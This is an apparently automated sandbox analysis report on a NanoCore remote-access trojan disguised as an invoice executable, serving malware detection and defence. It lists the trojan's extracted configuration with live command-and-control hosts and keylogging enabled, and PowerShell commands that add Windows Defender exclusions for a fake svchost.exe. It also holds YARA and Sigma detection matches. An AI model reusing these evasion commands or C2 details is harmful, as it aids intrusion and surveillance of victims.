Loading ...

Play interactive tourEdit tour

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Sample Name:CN-Invoice-XXXXX9808-19011143287989.exe
Analysis ID:356721
MD5:e9cd061b2286d8098153c9d9e2ed0b4b
SHA1:e30565df7c0597a76857532e4ca7df6d2728e7b5
SHA256:520fae27134b14bb92d3858083c08496cee8b1c7631f0a374c5e168adfa799f2
Tags:exeNanoCoresigned
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN-Invoice-XXXXX9808-19011143287989.exe (PID: 6200 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' MD5: E9CD061B2286D8098153C9D9E2ED0B4B)
    • powershell.exe (PID: 5864 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 744 cmdline: 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7016 cmdline: 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6992 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4780 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4240 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 4244 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 4928 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5888 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 7132 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7060 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6140 cmdline: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: E9CD061B2286D8098153C9D9E2ED0B4B)
  • svchost.exe (PID: 6020 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 4876 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6180 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 3524 cmdline: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' MD5: E9CD061B2286D8098153C9D9E2ED0B4B)
      • powershell.exe (PID: 6996 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 7048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5800 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 1320 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "5c958888-f81c-42a4-939d-31983a2cd9ba", "Group": "wuzzy122", "Domain1": "185.157.160.233", "Domain2": "annapro.linkpc.net", "Port": 2212, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1056d:$x1: NanoCore.ClientPluginHost
  • 0x4338d:$x1: NanoCore.ClientPluginHost
  • 0x75fad:$x1: NanoCore.ClientPluginHost
  • 0x105aa:$x2: IClientNetworkHost
  • 0x433ca:$x2: IClientNetworkHost
  • 0x75fea:$x2: IClientNetworkHost
  • 0x140dd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x46efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x79b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x102d5:$a: NanoCore
    • 0x102e5:$a: NanoCore
    • 0x10519:$a: NanoCore
    • 0x1052d:$a: NanoCore
    • 0x1056d:$a: NanoCore
    • 0x430f5:$a: NanoCore
    • 0x43105:$a: NanoCore
    • 0x43339:$a: NanoCore
    • 0x4334d:$a: NanoCore
    • 0x4338d:$a: NanoCore
    • 0x75d15:$a: NanoCore
    • 0x75d25:$a: NanoCore
    • 0x75f59:$a: NanoCore
    • 0x75f6d:$a: NanoCore
    • 0x75fad:$a: NanoCore
    • 0x10334:$b: ClientPlugin
    • 0x10536:$b: ClientPlugin
    • 0x10576:$b: ClientPlugin
    • 0x43154:$b: ClientPlugin
    • 0x43356:$b: ClientPlugin
    • 0x43396:$b: ClientPlugin
    00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xff8d:$x1: NanoCore.ClientPluginHost
      • 0xffca:$x2: IClientNetworkHost
      • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe38d:$x1: NanoCore.ClientPluginHost
      • 0xe3ca:$x2: IClientNetworkHost
      • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe105:$x1: NanoCore Client.exe
      • 0xe38d:$x2: NanoCore.ClientPluginHost
      • 0xf9c6:$s1: PluginCommand
      • 0xf9ba:$s2: FileCommand
      • 0x1086b:$s3: PipeExists
      • 0x16622:$s4: PipeCreated
      • 0xe3b7:$s5: IClientLoggingHost
      0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xe0f5:$a: NanoCore
        • 0xe105:$a: NanoCore
        • 0xe339:$a: NanoCore
        • 0xe34d:$a: NanoCore
        • 0xe38d:$a: NanoCore
        • 0xe154:$b: ClientPlugin
        • 0xe356:$b: ClientPlugin
        • 0xe396:$b: ClientPlugin
        • 0xe27b:$c: ProjectData
        • 0xec82:$d: DESCrypto
        • 0x1664e:$e: KeepAlive
        • 0x1463c:$g: LogClientMessage
        • 0x10837:$i: get_Connected
        • 0xefb8:$j: #=q
        • 0xefe8:$j: #=q
        • 0xf004:$j: #=q
        • 0xf034:$j: #=q
        • 0xf050:$j: #=q
        • 0xf06c:$j: #=q
        • 0xf09c:$j: #=q
        • 0xf0b8:$j: #=q
        22.2.svchost.exe.532d6f8.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x42dad:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x42dea:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        • 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 61 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Sigma detected: Executables Started in Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140
        Sigma detected: Execution in Non-Executable FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140
        Sigma detected: Suspicious Program Location Process StartsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140
        Sigma detected: Suspicious Svchost ProcessShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140
        Sigma detected: System File Execution Location AnomalyShow sources
        Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, NewProcessName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, OriginalFileName: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7060, ProcessCommandLine: 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' , ProcessId: 6140

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "5c958888-f81c-42a4-939d-31983a2cd9ba", "Group": "wuzzy122", "Domain1": "185.157.160.233", "Domain2": "annapro.linkpc.net", "Port": 2212, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeReversingLabs: Detection: 27%
        Multi AV Scanner detection for submitted fileShow sources
        Source: CN-Invoice-XXXXX9808-19011143287989.exeReversingLabs: Detection: 27%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: CN-Invoice-XXXXX9808-19011143287989.exeJoe Sandbox ML: detected
        Source: 25.2.CasPol.exe.5840000.9.unpackAvira: Label: TR/NanoCore.fadte

        Compliance:

        barindex
        Uses 32bit PE filesShow sources
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: \??\C:\Windows\mscorlib.pdb( source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
        Source: Binary string: .pdb> source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InprocHandler32 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000000.684807713.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp
        Source: Binary string: npMiVisualBasic.pdbT]_ source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968675958.0000000006138000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb2F source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: \??\C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
